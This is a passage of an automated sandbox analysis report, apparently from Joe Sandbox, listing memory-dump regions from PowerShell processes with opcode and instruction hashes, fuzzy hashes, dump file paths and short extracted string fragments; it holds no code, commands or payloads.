                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff887a90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e8fb81510c1ae1f0068b64260ca471afd46af97a29cd267eec167578406d355
                                                                                      • Instruction ID: e0a2528004377ed8eb43903e679fabd063ff1131a3d0980467924c2bb41d0fe4
                                                                                      • Opcode Fuzzy Hash: 1e8fb81510c1ae1f0068b64260ca471afd46af97a29cd267eec167578406d355
                                                                                      • Instruction Fuzzy Hash: 5FF0BE31E4C5488FEA94EB4CE4425E873F0FF4532071100B6E129CB153CA29EC50CB41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8,e$H1e$l;[$-e$/e
                                                                                      • API String ID: 0-1384525797
                                                                                      • Opcode ID: 8fb96a2ff55fe7d0b2a907e769c4702d83f4c78896709a41451b8929f956f157
                                                                                      • Instruction ID: d0aaf81129c809466b9cc87c406cdc33de1c5f9cbedb004ef32ac760d27e5d89
                                                                                      • Opcode Fuzzy Hash: 8fb96a2ff55fe7d0b2a907e769c4702d83f4c78896709a41451b8929f956f157
                                                                                      • Instruction Fuzzy Hash: EC518052D8E6C39FF71686780C29269AFB1BF53790B5C45FEC4E88A097E60D9918C381
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !L_^$"L_^$#L_^$8Dy
                                                                                      • API String ID: 0-2397290002
                                                                                      • Opcode ID: c1347bc24c745649f6c3fd02c66fe925429994eb5101fd1895797324a25d5174
                                                                                      • Instruction ID: e90ebb7c0df136c0ae2712d240220bf1d7cefcdf847183a1b3d0f194fc3e1b89
                                                                                      • Opcode Fuzzy Hash: c1347bc24c745649f6c3fd02c66fe925429994eb5101fd1895797324a25d5174
                                                                                      • Instruction Fuzzy Hash: D3C17863D8D6C39AEB175A386C6A1E97FB0FF936A471900F7C0848B0A7D91D2496C351
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @Je$I$^$x.e
                                                                                      • API String ID: 0-489143813
                                                                                      • Opcode ID: bf30e5d758f5d9c2addcd4a85767beae3b1dcce78591c9dc1db332b33356667e
                                                                                      • Instruction ID: 4648bdb275f29a8cc5938f3516eb34160ecfe6862a5c8cd383937adab16aeed2
                                                                                      • Opcode Fuzzy Hash: bf30e5d758f5d9c2addcd4a85767beae3b1dcce78591c9dc1db332b33356667e
                                                                                      • Instruction Fuzzy Hash: AC31A152C4E6D24FE7564A6C2C1927A6F71BF82B94F1C40FBC0988F0DBE94DA948C342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1743055094.00007FF887A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff887a80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1ec1147203035398798ac1005da7d186be3115c1760d25032a79c0cc0d69d3f9
                                                                                      • Instruction ID: 41386f4cfde08d48b49c45524f227a3c4c54e92b3450affa06a669e2c8b24e01
                                                                                      • Opcode Fuzzy Hash: 1ec1147203035398798ac1005da7d186be3115c1760d25032a79c0cc0d69d3f9
                                                                                      • Instruction Fuzzy Hash: 91321821E5DB8A4FE3A69768A8562B97BF1FF56250B0901FFD04DC7193E92C9C06C342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 31cb751080300ae1bf856216ddb2446589a0ec6ffcd0aa41f2427161a2738c0f
                                                                                      • Instruction ID: cd0c4c72c8f663a2384c910335f46b4145a86ddf258968fdbe4a21a015795e6d
• Opcode Fuzzy Hash: 31cb751080300ae1bf856216ddb2446589a0ec6ffcd0aa41f2427161a2738c0f
• Instruction Fuzzy Hash: 5061A370E09A598FDB59DBACD8556EC7BF1FF49310F14406ED049D72A2CB39A842CB81

Memory Dump Source
• Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction ID: 15dd9b60c6169c859de73191573b94f2a9dda3fac5984570e4b78192f630d007
• Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction Fuzzy Hash: 7601A77011CB0D8FD744EF0CE455AA5B3E0FB85360F10056DE58AC3691D636E881CB42

Strings
Memory Dump Source
• Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
Similarity
• API ID:
• String ID: (0e$8,e$H1e$P/e$p0e$-e$/e
• API String ID: 0-2586823915
• Opcode ID: 71e267f5a5d28ec9721aad765775586a2e939b46ab251b88b765e86da89564d6
• Instruction ID: e9d475211b61a14af4ccfcfb976aa3922174a7ebe169154981390b4c597656e7
• Opcode Fuzzy Hash: 71e267f5a5d28ec9721aad765775586a2e939b46ab251b88b765e86da89564d6
• Instruction Fuzzy Hash: F141C412D8E6D38FE3668A681C1913DAEB1FF12A90B5804FFC1995709BD91E9E19C3C1

Strings
Memory Dump Source
• Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
Similarity
• API ID:
• String ID: @Je$I$^$p@y$x.e
• API String ID: 0-3677563473
• Opcode ID: 68fed0f9f71604e39c3dfd7600fe450b2d2899d5e6bff7ac13785da057e9b9d6
• Instruction ID: 3187065041b01d56a002822ced54ed4240808d734c67d7e4c7a3238972b3d5b5
• Opcode Fuzzy Hash: 68fed0f9f71604e39c3dfd7600fe450b2d2899d5e6bff7ac13785da057e9b9d6
• Instruction Fuzzy Hash: 7B21A552C8EAE24FE2568A682C1D1796EB3BF42644B5C40FBC1485709FE84DED18D385

Strings
Memory Dump Source
• Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
Similarity
• API ID:
• String ID: @Je$I$^$p@y
• API String ID: 0-3451460963
• Opcode ID: 6955062cdc464e31150553535256b5cba93fed2807ee267bdf3e3c2b9821fb6b
• Instruction ID: 09b9c70468ae0165ae327c495f848192b7f708e2554173de86cf204e3258c468
• Opcode Fuzzy Hash: 6955062cdc464e31150553535256b5cba93fed2807ee267bdf3e3c2b9821fb6b
• Instruction Fuzzy Hash: 78218252D4E6E24FE366496C2C2C1792FB2BF12690B4840FBC19C9B0EBE95C9D58C346